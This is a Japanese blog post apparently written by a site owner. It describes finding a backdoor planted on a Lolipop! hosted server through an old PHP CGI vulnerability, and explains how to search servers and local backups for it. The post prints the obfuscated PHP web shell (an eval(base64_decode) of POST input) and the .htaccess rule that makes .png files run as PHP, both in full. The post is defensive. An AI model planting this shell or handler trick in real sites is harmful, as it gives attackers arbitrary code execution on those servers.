知らないうちにロリポップ!にバックドアが仕掛けられていた!


投稿日:2014年3月23日
  • 2
  • 0


あわや大惨事!ハッカーに任意のPHPを実行される危険があった

backdoor

なんだか愉快なアイキャッチを用意しましたが、事態はかなり深刻でした。

危うくハッカーに弄られ放題になるところでした。
バックアップファイルもしっかりチェックする必要があるぞ、という話です。


バックドアを発見する経緯

何かがあった時のために、サーバのファイルをzip圧縮してバックアップして管理していました。
今回そのバックアップから、あるファイルを取り出そうと圧縮ファイルを解凍。するとMicrosoft Security Essentialsより、以下のアラートが表示されました。

backdoor01

何だ?」と思って当該フォルダを調べてみたところ「.58b4b.png」という怪しいファイル名の画像が…。画像なのにわざわざLinux上で不可視ファイルになる「.」を先頭に付けるわけがない。
プロパティを見ると99バイトしかありません。

backdoor02

そこで、このファイルをテキストエディタで開いてみると以下のようなコードであることがわかりました。

<?php ($_=$_POST).($_1='_').($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>

さらに同じディレクトリに「.htaccess」が設置され以下の内容になっていました。

order deny
deny from all
AddHandler application/x-httpd-php .png

最後にもう一つ、ルートディレクトリに「index.bak.php」というファイルが作成されていました。
このファイルの内容は画像ファイルに偽装した「.58b4b.png」と同じでした。

<?php ($_=$_POST).($_1='_').($_4=$$_1).($_4=$_4[$_1]).($_4($$_1)).eval(base64_decode($_4($$_1)));?>

これは何だろうと検索してみると、2012年に流行ったCGI版のPHPにある脆弱性を利用したバックドアの設置でした。

このまま放置しておくとローカルファイル・インクルード攻撃(Local File Include attack)を受ける可能性があります。
簡単にいえば、任意のPHPを実行できる環境をハッカーに与えるようなものです。

参考URL:
”improve it!” CGI版のPHPの脆弱性を突いてトラップを仕掛けた事例
ZF-Ex BLOG .htaccess改ざんの件、恐らく完結
お笑いプログラマの技術メモ PHP eval base64_decode 攻撃とその対処方法

ロリポップ!の対応

【重要】PHP5.2及びPHP5.3の脆弱性への緊急対応につきまして

参考URLとロリポップの対応から分かるように、現在はこの脆弱性は修正され対策済みなので問題ありません。しかし、仕掛けられたバックドアは非常に危険なため、もし当該ファイルがある場合はただちに削除してください


バックドアが仕掛けられていないか調べる方法

サーバ側、ローカル側合わせて調べておいたほうが安心です。

サーバにバックドアが仕掛けられていないか調べる方法

WinSCPを使えば、サーバ上のファイルを簡単に検索できます。

コマンド > ファイル検索」を選択。

backdoor03

ファイルマスクに「.htaccess」、検索に「/(ルートディレクトリという意味)」と入力して検索ボタンを押せば自動で探してくれます。

backdoor04

見に覚えのない66バイト程度の「.htaccess」がないかチェックしてください。
同じく「index.bak.php」についても検索しておけば安心です。

ローカルのファイルにバックドアが仕掛けられていないか調べる方法

ローカルであれば詳細な検査ができます。今回のバックドアはよくある攻撃方法で、肝になるコードは「eval(base64_decode」という部分です。
ファイルの内容まで検索できるソフトを利用して全文検索をしておくと、より安全です。

ファイル内の全文検索は以前の投稿で紹介した「DesktopHE」がお勧めです。

backdoor05

詳しい使い方は「Google Desktopが終了。代替ソフトであるDesktopHEを使おう。」を参照してください。

以上、検索方法でした。
最近「バックアップからファイルを復元した」という方は確認してみてください。


余談ですが、昨年9月に起きた大規模改ざんの顛末はどうなったんでしょうか?
被害について警察に相談するとありましたが、犯人の特定はできたのでしょうか?気になるところです。


現在のページを共有する



現在のページに関連する記事

Google Desktopが終了。代替ソフトであるDesktopHEを使おう。 Google Desktopが終了。代替ソフトであるDesktopHEを使おう。
知らないうちにロリポップ!にバックドアが仕掛けられていた! Apacheで拡張子が「.html」のファイル内でPHPを実行する方法
知らないうちにロリポップ!にバックドアが仕掛けられていた! ロリポップ!で起きている大規模な改ざんからWordPressサイトを守る方法
サーバへPukiWikiをインストール サーバへPukiWikiをインストール
知らないうちにロリポップ!にバックドアが仕掛けられていた! Google Desktopの代替ソフトEverythingを使って、XPで最も早いファイル名検索
知らないうちにロリポップ!にバックドアが仕掛けられていた! ロリポップ!から「不正なアクセスを検知いたしました」というメールが届いた
知らないうちにロリポップ!にバックドアが仕掛けられていた! XAMPPで.htaccessを利用すると500Errorになる理由

おすすめの記事

Question2AnswerへreCAPTCHAを導入する方法

Question2AnswerへreCAPTCHAを導入する方法

「アマレコTV」でWindows 10のPC画面に表示されている動画を撮影する方法

「アマレコTV」でWindows 10のPC画面に表示されている動画を撮…

WordPressの新・旧ループからカスタムクエリ・アーカイブまで徹底解説

WordPressの新・旧ループからカスタムクエリ・アーカイブまで徹…

最新のXAMPPをインストールし、安全・高速に運用する方法

最新のXAMPPをインストールし、安全・高速に運用する方法

WordPressのサイトをHTTPS化して学ぶLet’s Encryptの使い方

WordPressのサイトをHTTPS化して学ぶLet’s Encryptの使い方

Apacheのmod_deflateでコンテンツを圧縮してサイトを高速化する方法

Apacheのmod_deflateでコンテンツを圧縮してサイトを高速化する…

Apacheのmod_expiresでファイルタイプごとにキャッシュをコントロールする方法

Apacheのmod_expiresでファイルタイプごとにキャッシュをコント…

W3 Total Cacheの設定を通して学ぶ、WordPressを高速化するキャッシュの仕組み

W3 Total Cacheの設定を通して学ぶ、WordPressを高速化するキャ…


コメントを残す

コメントは認証制のため、すぐには反映されません。

プログラミングに関する質問は「日本語でプログラミングの悩みを解決するQ&Aサイト sukegra」をご利用ください。